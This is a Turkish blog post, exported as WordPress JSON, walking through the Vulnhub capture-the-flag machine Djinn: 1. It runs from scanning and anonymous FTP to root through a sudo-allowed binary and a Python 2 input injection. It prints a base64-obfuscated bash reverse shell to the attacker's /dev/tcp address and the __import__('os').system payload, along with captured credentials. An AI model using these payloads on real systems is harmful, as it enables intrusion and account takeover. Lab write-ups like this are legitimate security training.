{"id":1300,"date":"2021-07-05T21:49:42","date_gmt":"2021-07-05T21:49:42","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1300"},"modified":"2021-07-05T21:49:42","modified_gmt":"2021-07-05T21:49:42","slug":"djinn-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/05\/djinn-1\/","title":{"rendered":"DJINN: 1"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nLevel: Beginner-Intermediate<br \/>\nflags: user.txt and root.txt<br \/>\nDescription: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.<br \/>\nFormat: Virtual Machine (Virtualbox - OVA)<br \/>\nOperating System: Linux<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/djinn-1,397\/\">https:\/\/www.vulnhub.com\/entry\/djinn-1,397\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/djinn\/djinn.ova\">https:\/\/download.vulnhub.com\/djinn\/djinn.ova<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep &quot;System&quot;\n192.168.101.23  08:00:27:32:ac:8f   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.101.24  netmask 255.255.255.0  broadcast 192.168.101.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 36  bytes 3542 (3.4 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 525  bytes 32536 (31.7 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>nmap taramas\u0131 ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 142\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-05 16:46 EDT\nNmap scan report for 192.168.101.23\nHost is up (0.00091s latency).\nNot shown: 65531 closed ports\nPORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt\n| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt\n|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.101.24\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA)\n|   256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA)\n|_  256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519)\n1337\/tcp open  waste?\n| fingerprint-strings: \n|   NULL: \n|     ____ _____ _ \n|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ \n|     \\x20\/ _ \\x20 | | | | &#039;_ ` _ \\x20\/ _ \\n| |_| | (_| | | | | | | __\/ | | | | | | | | | __\/\n|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|\n|     Let&#039;s see how good you are with simple maths\n|     Answer my questions 1000 times and I&#039;ll give you your gift.\n|     &#039;-&#039;, 1)\n|   RPCCheck: \n|     ____ _____ _ \n|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ \n|     \\x20\/ _ \\x20 | | | | &#039;_ ` _ \\x20\/ _ \\n| |_| | (_| | | | | | | __\/ | | | | | | | | | __\/\n|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|\n|     Let&#039;s see how good you are with simple maths\n|     Answer my questions 1000 times and I&#039;ll give you your gift.\n|_    &#039;-&#039;, 5)\n7331\/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)\n|_http-server-header: Werkzeug\/0.16.0 Python\/2.7.15+\n|_http-title: Lost in space\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port1337-TCP:V=7.91%I=7%D=7\/5%Time=60E36F95%P=x86_64-pc-linux-gnu%r(NUL\nSF:L,1BC,&quot;\\x20\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x20\\\nSF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\/\\x20___\\|\\x20__\\x\nSF:20_\\x20_\\x20__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x20_\nSF:_\\x20___\\x20\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20\/\\x20_`\\x20\\|\\x20&#039;_\\x\nSF:20`\\x20_\\x20\\\\\\x20\/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20&#039;_\\x2\nSF:0`\\x20_\\x20\\\\\\x20\/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\|\\x\nSF:20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__\/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\nSF:\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__\/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\|\\x\nSF:20\\|_\\|\\\\___\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\n\\\nSF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\nSF:\\nLet&#039;s\\x20see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20maths\\\nSF:nAnswer\\x20my\\x20questions\\x201000\\x20times\\x20and\\x20I&#039;ll\\x20give\\x20y\nSF:ou\\x20your\\x20gift\\.\\n\\(4,\\x20&#039;-&#039;,\\x201\\)\\n&gt;\\x20&quot;)%r(RPCCheck,1BC,&quot;\\x20\nSF:\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\/\\x20___\\|\\x20__\\x20_\\x20_\\x2\nSF:0__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x20__\\x20___\\x2\nSF:0\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20\/\\x20_`\\x20\\|\\x20&#039;_\\x20`\\x20_\\x2\nSF:0\\\\\\x20\/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20&#039;_\\x20`\\x20_\\x20\nSF:\\\\\\x20\/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\\nSF:x20\\|\\x20\\|\\x20\\x20__\/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\\nSF:|\\x20\\|\\x20\\|\\x20\\x20__\/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\__\nSF:_\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\nLet&#039;s\\x20\nSF:see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20maths\\nAnswer\\x20\nSF:my\\x20questions\\x201000\\x20times\\x20and\\x20I&#039;ll\\x20give\\x20you\\x20your\\\nSF:x20gift\\.\\n\\(3,\\x20&#039;-&#039;,\\x205\\)\\n&gt;\\x20&quot;);\nMAC Address: 08:00:27:32:AC:8F (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.91 ms 192.168.101.23\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 120.57 seconds\n<\/code><\/pre>\n<p>ftp anonymous a\u00e7\u0131k. Hemen oraya gidip neler oldu\u011funa bakal\u0131m. Daha sonras\u0131nda 7331 ile ilgilenece\u011fim. Birde 1337'de yaz\u0131lm\u0131\u015f bir uygulama var. Bu uygulamaya nc ile ba\u011fland\u0131\u011f\u0131n\u0131zda size s\u00fcrekli matematiksel i\u015flemler sordu\u011funu g\u00f6receksiniz. Basit bir soket app yazarak sunucudan gelen verileri parse ederek asl\u0131nda 1000 tane soruyu cevaplayabiliriz. En az\u0131ndan b\u00f6yle d\u00fc\u015f\u00fcn\u00fcyordum ancak yapamad\u0131m \ud83d\ude42 Uzun s\u00fcre \u00fcst\u00fcnde u\u011fra\u015ft\u0131ktan sonra pes edip di\u011fper servislerle ilgilenmeye ba\u015flad\u0131m. Nas\u0131l yapamad\u0131m kendime \u015fa\u015f\u0131youm \u00e7\u00fcnk\u00fc benzer bir uygulamay\u0131 localimde yaz\u0131p localimde test etti\u011fimde \u00e7al\u0131\u015f\u0131yor. \u0130\u015fin garibi makineyi \u00e7\u00f6zd\u00fckten sonra bu makineden sadece 1 dakika i\u00e7erisinde root haklar\u0131nda nas\u0131l i\u015flem yapabiliriz bunu g\u00f6sterece\u011fim. Ger\u00e7ekten ince d\u00fc\u015f\u00fcn\u00fclm\u00fc\u015f ve bilgi isteyen bir makine...<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# ftp 192.168.101.23 \nConnected to 192.168.101.23.\n220 (vsFTPd 3.0.3)\nName (192.168.101.23:kali): anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt\n-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt\n-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt\n226 Directory send OK.\nftp&gt; get creds.txt\nlocal: creds.txt remote: creds.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for creds.txt (11 bytes).\n226 Transfer complete.\n11 bytes received in 0.01 secs (0.8682 kB\/s)\nftp&gt; get game.txt\nlocal: game.txt remote: game.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for game.txt (128 bytes).\n226 Transfer complete.\n128 bytes received in 0.00 secs (64.9688 kB\/s)\nftp&gt; get message.txt\nlocal: message.txt remote: message.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for message.txt (113 bytes).\n226 Transfer complete.\n113 bytes received in 0.01 secs (9.7977 kB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# ls\ncreds.txt  game.txt  message.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# cat creds.txt \nnitu:81299\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# cat game.txt \noh and I forgot to tell you I&#039;ve setup a game for you on port 1337. See if you can reach to the \nfinal level and get the prize.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# cat message.txt \n@nitish81299 I am going on holidays for few days, please take care of all the work. \nAnd don&#039;t mess up anything.\n<\/code><\/pre>\n<p>Evet san\u0131r\u0131m baz\u0131 kullan\u0131c\u0131lar elde etmi\u015f olabiliriz ancak eminde de\u011filim. Dedi\u011fim gibi 1337'deki oyunla ilgili bir notumuz var ayr\u0131ca. \u015eimdi http'ye odaklanal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.101.23:7331  --follow-redirect --status-codes-blacklist &quot;404&quot; --no-error --threads 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt -x php,html,sql,zip,bak,sql,txt,php5,py,rar,7z,log,cgi --expanded  | tee gobusterKucukNOSlash \n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.101.23:7331\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              rar,7z,php,html,sql,zip,txt,py,bak,php5,log,cgi\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/05 17:05:16 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.101.23:7331\/genie                (Status: 200) [Size: 1676]\nhttp:\/\/192.168.101.23:7331\/wish                 (Status: 200) [Size: 385] \n\n===============================================================\n2021\/07\/05 17:32:48 Finished\n===============================================================\n<\/code><\/pre>\n<p>Evet gobuster'\u0131n --add-slash'l\u0131 olmayan taramas\u0131nda baz\u0131 sonu\u00e7lar ald\u0131k. Taray\u0131c\u0131da bunlar\u0131 inceledi\u011fimde bir web shell oldu\u011funu anlad\u0131m. \u0130ncelemeler sonucunda aa\u011f\u0131daki \u015fekilde filtrelenmi\u015f web shell'i bypass edip, reverse alabildim.<\/p>\n<p><strong><a href=\"http:\/\/192.168.101.23:7331\/wish\">http:\/\/192.168.101.23:7331\/wish<\/a><\/strong> adresinde yapt\u0131\u011f\u0131m i\u015flem <strong>tp:\/\/192.168.101.23:7331\/genie<\/strong> adresinde sonu\u00e7 buluyor.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# echo &quot;bash -i &gt;&amp; \/dev\/tcp\/192.168.101.24\/1822 0&gt;&amp;1&quot; | base64 \nYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# echo &quot;YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK&quot; | base64 -d | bash<\/code><\/pre>\n<p><code>echo &quot;YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK&quot; | base64 -d | bash<\/code> payload'\u0131n\u0131 hedef sunucuda \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/dji]\n\u2514\u2500# nc -lvp 1822                                                                                                                                                                                                                        130 \u2a2f\nlistening on [any] 1822 ...\n192.168.101.23: inverse host lookup failed: Unknown host\nconnect to [192.168.101.24] from (UNKNOWN) [192.168.101.23] 39600\nbash: cannot set terminal process group (660): Inappropriate ioctl for device\nbash: no job control in this shell\nwww-data@djinn:\/opt\/80$ python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\npython -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nwww-data@djinn:\/opt\/80$ \n\nwww-data@djinn:\/opt\/80$ whoami\nwhoami\nwww-data\nwww-data@djinn:\/opt\/80$ \n<\/code><\/pre>\n<p>\u0130\u00e7eride biraz gezindikten sonra a\u015fa\u011f\u0131dakileri buldum.<\/p>\n<pre><code class=\"language-sh\">www-data@djinn:\/opt\/80$ ls\nls\napp.py  app.pyc  static  templates\nwww-data@djinn:\/opt\/80$ \n\nwww-data@djinn:\/opt\/80$ cat app.py\ncat app.py\nimport subprocess\n\nfrom flask import Flask, redirect, render_template, request, url_for\n\napp = Flask(__name__)\napp.secret_key = &quot;key&quot;\n\nCREDS = &quot;\/home\/nitish\/.dev\/creds.txt&quot;\n\nRCE = [&quot;\/&quot;, &quot;.&quot;, &quot;?&quot;, &quot;*&quot;, &quot;^&quot;, &quot;$&quot;, &quot;eval&quot;, &quot;;&quot;]\n\ndef validate(cmd):\n    if CREDS in cmd and &quot;cat&quot; not in cmd:\n        return True\n\n    try:\n        for i in RCE:\n...<\/code><\/pre>\n<pre><code class=\"language-sh\">www-data@djinn:\/opt\/80$ cat \/home\/nitish\/.dev\/creds.txt\ncat \/home\/nitish\/.dev\/creds.txt\nnitish:p4ssw0rdStr3r0n9\nwww-data@djinn:\/opt\/80$ \n\nwww-data@djinn:\/opt\/80$ \n\nwww-data@djinn:\/opt\/80$ su nitish\nsu nitish\nPassword: p4ssw0rdStr3r0n9\n\nnitish@djinn:\/opt\/80$ whoami\nwhoami\nnitish\n<\/code><\/pre>\n<p>Yeni kullan\u0131c\u0131 ilede baz\u0131 inceleme i\u015flemleri ger\u00e7ekle\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">sudo -l\nMatching Defaults entries for nitish on djinn:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser nitish may run the following commands on djinn:\n    (sam) NOPASSWD: \/usr\/bin\/genie\n<\/code><\/pre>\n<p>\u0130nternet \u00fczerinde b\u00f6yle yayg\u0131n bir binary bulamad\u0131m. Bunun \u00fczerine CTF i\u00e7in \u00f6zel haz\u0131rland\u0131\u011f\u0131n\u0131 d\u00fc\u015f\u00fcnd\u00fcm ve incelemeye ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">nitish@djinn:\/opt\/80$ strings \/usr\/bin\/genie | wc\nstrings \/usr\/bin\/genie | wc\n    758     958   12118\nnitish@djinn:\/opt\/80$ \n\nnitish@djinn:\/opt\/80$ \/usr\/bin\/genie -h\n\/usr\/bin\/genie -h\nusage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish\n\nI know you&#039;ve came to me bearing wishes in mind. So go ahead make your wishes.\n\npositional arguments:\n  wish                  Enter your wish\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -g, --god             pass the wish to god\n  -p SHELL, --shell SHELL\n                        Gives you shell\n  -e EXEC, --exec EXEC  execute command\nnitish@djinn:\/opt\/80$ \n\nnitish@djinn:\/opt\/80$ strings \/usr\/bin\/genie | nl | grep shell\nstrings \/usr\/bin\/genie | nl | grep shell\n   331  Gives you shell\n   341  shell\n   356  --shell\n   469  __pyx_kp_u_Gives_you_shell\n   480  __pyx_n_s_shell_2\n   499  __pyx_kp_u_shell\n   519  __pyx_n_u_shell_2\n   542  __pyx_k_Gives_you_shell\n   595  __pyx_k_shell\n   596  __pyx_k_shell_2\n<\/code><\/pre>\n<p>Parametreleri do\u011fru kullanam\u0131yordum, bunun \u00fczerine incelemeye ba\u015flad\u0131m. <code>cmd<\/code> diye bir parametre buldum ancak daha sonras\u0131nda belki vard\u0131r diye man dok\u00fcman\u0131na bakt\u0131m. Ordada cmd parametresinden bahsediyordu.<\/p>\n<pre><code class=\"language-sh\">nitish@djinn:\/opt\/80$ man \/usr\/bin\/genie\nman \/usr\/bin\/genie\nWARNING: terminal is not fully functional\n-  (press RETURN) \n\nman(8)                          genie man page                          man(8)\n\nNAME\n       genie - Make a wish\n\nSYNOPSIS\n       genie [-h] [-g] [-p SHELL] [-e EXEC] wish\n\nDESCRIPTION\n       genie would complete all your wishes, even the naughty ones.\n\n       We  all  dream  of getting those crazy privelege escalations, this will\n       even help you acheive that.\n\nOPTIONS\n       wish\n\n              This is the wish you want to make .\n\n       -g, --god\n\n              Sometime we all would like to make a wish to  god,  this  option\n              let you make wish directly to God;r q to quit)\n Manual page genie(8) line 2 (press h for help or q to quit) \n\n              Though  genie can&#039;t gurantee you that your wish will be heard by\n              God, he&#039;s a busy man you know;\n\n       -p, --shell\n\n              Well who doesn&#039;t love those. You can get shell. Ex: -p &quot;\/bin\/sh&quot;\n\n       -e, --exec\n\n              Execute command on someone else computer is just too  damn  fun,\n              but this comes with some restrictions.\n\n       -cmd\n\n              You know sometime all you new is a damn CMD, windows I love you.\n\nSEE ALSO\n       mzfr.github.io\n\nBUGS\n       There  are  shit  loads  of bug in this program, it&#039;s all about finding\n       one.\n<\/code><\/pre>\n<p>Bunun \u00fczerine...<\/p>\n<pre><code class=\"language-sh\">nitish@djinn:\/opt\/80$ sudo -l\nsudo -l\nMatching Defaults entries for nitish on djinn:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser nitish may run the following commands on djinn:\n    (sam) NOPASSWD: \/usr\/bin\/genie\nnitish@djinn:\/opt\/80$ \n\nnitish@djinn:\/opt\/80$ \n\nnitish@djinn:\/opt\/80$ sudo -u sam \/usr\/bin\/genie -cmd ls\nsudo -u sam \/usr\/bin\/genie -cmd ls\nmy man!!\n$ whoami\nwhoami\nsam\n$ python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\npython -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nsam@djinn:\/opt\/80$ \n<\/code><\/pre>\n<p>Harika! \u015eimdi sam ile ilgili ara\u015ft\u0131rmalar yapmaya ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">sam@djinn:\/opt\/80$ sudo -l\nsudo -l\nMatching Defaults entries for sam on djinn:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser sam may run the following commands on djinn:\n    (root) NOPASSWD: \/root\/lago\nsam@djinn:\/opt\/80$ \n\nsam@djinn:\/opt\/80$ \n\nsam@djinn:\/opt\/80$ sudo -u root \/root\/lago\nsudo -u root \/root\/lago\nWhat do you want to do ?\n1 - Be naughty\n2 - Guess the number\n3 - Read some damn files\n4 - Work\nEnter your choice:2\n2\nChoose a number between 1 to 100: \nEnter your number: __import__(&quot;os&quot;).system(&quot;\/bin\/bash&quot;)\n__import__(&quot;os&quot;).system(&quot;\/bin\/bash&quot;)\nroot@djinn:\/opt\/80# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@djinn:\/opt\/80# cd \/root\ncd \/root\nroot@djinn:\/root# ls\nls\nlago  proof.sh\nroot@djinn:\/root# cat proof.sh\ncat proof.sh\n#!\/bin\/bash\n\nclear\n\nfiglet Amazing!!!\n\necho djinn pwned...\n\necho __________________________________________________________________________\n\necho\n\necho &quot;Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc&quot;\n\necho Path: $(pwd)\n\necho Date: $(date)\n\necho Whoami: $(whoami)\n\necho __________________________________________________________________________\n\necho\n\necho &quot;By @0xmzfr&quot;\n\necho &quot;&quot;\n\necho &quot;Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)&quot;\n\necho &quot;&quot;\n\nroot@djinn:\/root# .\/proof.sh    \n.\/proof.sh\n&#039;unknown&#039;: I need something more specific.\n    _                        _             _ _ _ \n   \/ \\   _ __ ___   __ _ ___(_)_ __   __ _| | | |\n  \/ _ \\ | &#039;_ ` _ \\ \/ _` |_  \/ | &#039;_ \\ \/ _` | | | |\n \/ ___ \\| | | | | | (_| |\/ \/| | | | | (_| |_|_|_|\n\/_\/   \\_\\_| |_| |_|\\__,_\/___|_|_| |_|\\__, (_|_|_)\n                                     |___\/       \ndjinn pwned...\n__________________________________________________________________________\n\nProof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc\nPath: \/root\nDate: Tue Jul 6 03:15:59 IST 2021\nWhoami: root\n__________________________________________________________________________\n\nBy @0xmzfr\n\nThanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)\n<\/code><\/pre>\n<p>Asl\u0131nda biraz \u015fanst\u0131. Uzun denemeler sonucu python2 input bug d\u00fc\u015f\u00fcnd\u00fcm ve denedim. Buradaki <code>__import__(&quot;os&quot;).system(&quot;\/bin\/bash&quot;)<\/code> payload'\u0131 tam belki anlamam\u0131\u015f olabilirsiniz. Bunun i\u00e7in size \u015fimdi bir hap video \u00f6nerece\u011fim. (<a href=\"https:\/\/www.youtube.com\/watch?v=YrxPtozTCI8\">https:\/\/www.youtube.com\/watch?v=YrxPtozTCI8<\/a>)<br \/>\n\u015eimdi gelelim ac\u0131kl\u0131 hikayeye e\u011fer akl\u0131ma ilk seferde bu gelseydi 1337'de \u00e7al\u0131\u015fan uygulamada direkt root olabilirdik...<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Documents\/tool\/enum]\n\u2514\u2500# nc 192.168.101.23 1337\n  ____                        _____ _                \n \/ ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ \n| |  _ \/ _` | &#039;_ ` _ \\ \/ _ \\   | | | | &#039;_ ` _ \\ \/ _ \\\n| |_| | (_| | | | | | |  __\/   | | | | | | | | |  __\/\n \\____|\\__,_|_| |_| |_|\\___|   |_| |_|_| |_| |_|\\___|\n\nLet&#039;s see how good you are with simple maths\nAnswer my questions 1000 times and I&#039;ll give you your gift.\n(1, &#039;+&#039;, 6)\n> __import__(&quot;os&quot;).system(&quot;id; hostname&quot;)\nuid=0(root) gid=0(root) groups=0(root)\ndjinn\nWrong answer\n<\/code><\/pre>\n<p>Sa\u011fl\u0131k olsun... \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/05\/djinn-1\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">DJINN: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[555],"class_list":["post-1300","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-python2-input","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1300"}],"version-history":[{"count":1,"href":"https:\/\/berenkudayg